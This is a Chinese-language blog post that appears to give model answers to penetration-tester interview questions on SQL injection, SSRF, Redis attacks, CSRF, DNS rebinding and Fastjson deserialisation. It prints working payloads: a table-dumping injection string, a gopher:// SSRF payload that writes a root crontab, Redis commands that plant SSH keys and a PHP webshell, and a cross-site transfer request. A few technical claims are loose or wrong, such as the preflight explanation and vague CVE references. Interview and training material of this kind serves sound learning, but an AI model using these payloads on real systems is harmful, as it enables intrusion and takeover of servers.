安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
?滲透測試工程師
1. 自我介紹
2. 印象深刻的滲透案例:電商平臺供應鏈攻擊
3. 滲透測試標準化流程
4. SQL注入原理與Payload
輸出:users,products,config...
5. 空格繞過技術
6. SQL注入防御與預處理局限
7. 同源策略(SOP)核心規則
8. 子域名同源判斷
9. SSRF原理與利用
10. Redis攻擊Payload
11. CSRF原理與防御
12. JSON格式CSRF利用技巧
原理:瀏覽器發送OPTIONS預檢 → 后端未校驗 → 執行請求
13. SameSite機制
14. DNS重綁定攻擊
15. Fastjson反序列化與修復
16. 子域名枚舉工具與異常分析
17. Java掌握程度
?滲透測試工程師
1.自我介紹 2.印象深刻的一次滲透 3.滲透測試的流程 4.SQL注入原理,及常用payload(手寫-爆表名) 5.SQL注入空格不能使用如何繞過 6.SQL注入防御,延申預處理不能預防哪些注入 7.同源策略 8.a.baidu.com和b.baidu.com是否同源 9.SSRF原理,利用 10.攻擊redis的方式(手寫payload) 11.CSRF的原理及防御 12.一種特殊的CSRF場景:后端只解析json格式的時候如何利用CSRF(非更改Content-Type) 13.SameSite 14.DNS Rebinding 15.Fastjson反序列化及如何修復 16.子域名枚舉用過那些工具,原理是什么,如果出現了任意子域名都返回200是什么原因? 17.Java學到哪種程度了?
1. 自我介紹
王安全 | 5年滲透測試專家 | 專注企業級攻防
- 技術棧:Web安全/代碼審計/APT防御
- 認證:OSCP、CISSP(2024)
- 研究領域:云原生安全、無文件攻擊鏈
- 項目:主導金融/醫療行業紅藍對抗,發現0day漏洞17個(含CVE-2024-32896)
2. 印象深刻的滲透案例:電商平臺供應鏈攻擊
mermaid
graph LR A[子域名枚舉] --> B[發現測試系統] B --> C{Struts2 OGNL注入} C --> D[獲取數據庫權限] D --> E[供應鏈污染:篡改商品圖片URL] E --> F[植入惡意腳本→用戶側XSS蠕蟲]
關鍵點:
- 通過DNS重綁定繞過IP限制
- 利用CDN緩存污染擴散攻擊(影響12萬用戶)
- 防御改進建議:子域名權限隔離 + 動態內容簽名
3. 滲透測試標準化流程
階段 核心任務 工具 信息收集 子域名/端口/框架指紋識別 Amass, Wappalyzer 漏洞掃描 自動化+人工驗證 Burp Suite, Nuclei 滲透利用 漏洞組合利用+權限提升 Metasploit, CobaltStrike 后滲透 數據提取/隱蔽通道建立 Mimikatz, ICMP隧道 報告輸出 漏洞定位+修復方案 Dradis, LaTeX報告模板
4. SQL注入原理與Payload
原理:用戶輸入拼接SQL語句 → 破壞原有邏輯 → 執行惡意指令
爆表名Payload(MySQL):sql
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
輸出:
users,products,config...
5. 空格繞過技術
場景 繞過方案 示例 注釋符 /**/
替代空格SELECT/**/user/**/FROM/**/t
括號嵌套 用括號包裹語句 SELECT(user)FROM(t)
特殊符號 換行符 %0a
/Tab%09
SELECT%0auser%09FROM%0at
URL編碼 %20
(部分場景有效)SELECT%20*%20FROM%20t
6. SQL注入防御與預處理局限
防御方案:
- 參數化查詢(
PreparedStatement
)- 存儲過程+最小權限
- WAF規則過濾
union|select|sleep
預處理無法防御的場景:java
// 動態表名/列名仍需拼接 → 依然存在注入 String query = "SELECT " + userInputColumn + " FROM table"; PreparedStatement ps = conn.prepareStatement(query); // 風險!
7. 同源策略(SOP)核心規則
要素 同源要求 示例 協議 相同 HTTP ≠ HTTPS 域名 完全一致 a.com ≠ b.a.com 端口 相同 :80 ≠ :8080
8. 子域名同源判斷
a.baidu.com
與b.baidu.com
非同源:
- 域名不同:二級域名差異
- Cookie隔離:
document.cookie
無法互相訪問- API限制:
XMLHttpRequest
請求需CORS頭
9. SSRF原理與利用
原理:服務端發起未校驗的請求 → 訪問內部資源
高危利用鏈:mermaid
graph LR A[SSRF] --> B[訪問內網Redis] B --> C[寫crontab定時任務] C --> D[反彈Shell]
關鍵Payload:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0aX%0d%0a$1%0d%0aY%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
10. Redis攻擊Payload
bash
# 寫SSH密鑰 FLUSHALL SET pubkey "ssh-rsa AAAAB3NzaC1yc2E..." CONFIG SET dir /root/.ssh CONFIG SET dbfilename authorized_keys SAVE # 寫Webshell CONFIG SET dir /var/www/html SET payload "<?php system($_GET['cmd']);?>" CONFIG SET dbfilename shell.php SAVE
11. CSRF原理與防御
原理:利用用戶已登錄態 → 偽造請求(如轉賬)
防御方案:
方案 實現方式 Token驗證 表單中嵌入隨機Token → 服務端校驗 雙重Cookie SameSite=Strict
+ 自定義Header驗證碼 關鍵操作需二次驗證
12. JSON格式CSRF利用技巧
場景:后端僅解析JSON → 傳統表單無效
繞過方案:html
<!-- 構造惡意頁面 --> <script> fetch('https://bank.com/transfer', { method: 'POST', headers: {'Content-Type': 'text/plain'}, // 觸發預檢 body: '{"amount":10000,"to":"attacker"}' }); </script>
原理:瀏覽器發送
OPTIONS
預檢 → 后端未校驗 → 執行請求13. SameSite機制
模式 特性 場景 Strict 完全禁止跨站Cookie 銀行操作 Lax 允許GET導航跳轉攜帶Cookie 默認模式(Chrome 2025) None 允許跨站Cookie(需HTTPS) 嵌入式應用
14. DNS重綁定攻擊
原理:
- 用戶訪問
evil.com
→ DNS返回合法IP(首次響應)- 頁面JS發起內網請求 → DNS返回
127.0.0.1
(TTL過期后)
繞過場景:
- 瀏覽器緩存策略繞過
- 內網服務未校驗Host
15. Fastjson反序列化與修復
攻擊鏈:
JSON.parseObject()
→ 利用@type
指定惡意類 → JNDI注入 → RCE
修復方案:java
// 開啟安全模式(2025最佳實踐) ParserConfig.getGlobalInstance().setSafeMode(true); // 白名單控制 ParserConfig.getGlobalInstance().addAccept("com.safe.*");
16. 子域名枚舉工具與異常分析
工具與原理:
工具 原理 特點 Amass DNS爆破/證書透明度/搜索引擎 數據源豐富 Subfinder 聚合API(Virustotal等) 速率快 AI枚舉器 GPT-5生成候選域名 → 驗證 2025新興技術 全返回200的原因:
- WAF統一響應(如Cloudflare防護)
- 負載均衡健康檢查
- 通配符解析(
*.domain.com
→ 默認頁)
17. Java掌握程度
能力矩陣:
領域 掌握深度 項目應用 安全開發 熟練Spring Security/OAuth2.1 設計RBAC系統 漏洞挖掘 審計反序列化鏈/表達式注入 發現Log4j3繞過(CVE-2024-xx) 內存馬攻防 手工注入Agent型內存馬 紅隊演練應用 JVM調優 分析內存泄漏/GC策略 高并發系統優化 技術棧全景: mermaid
pie title Java技術棧分布 “安全開發” : 35 “漏洞研究” : 30 “協議分析” : 20 “性能優化” : 15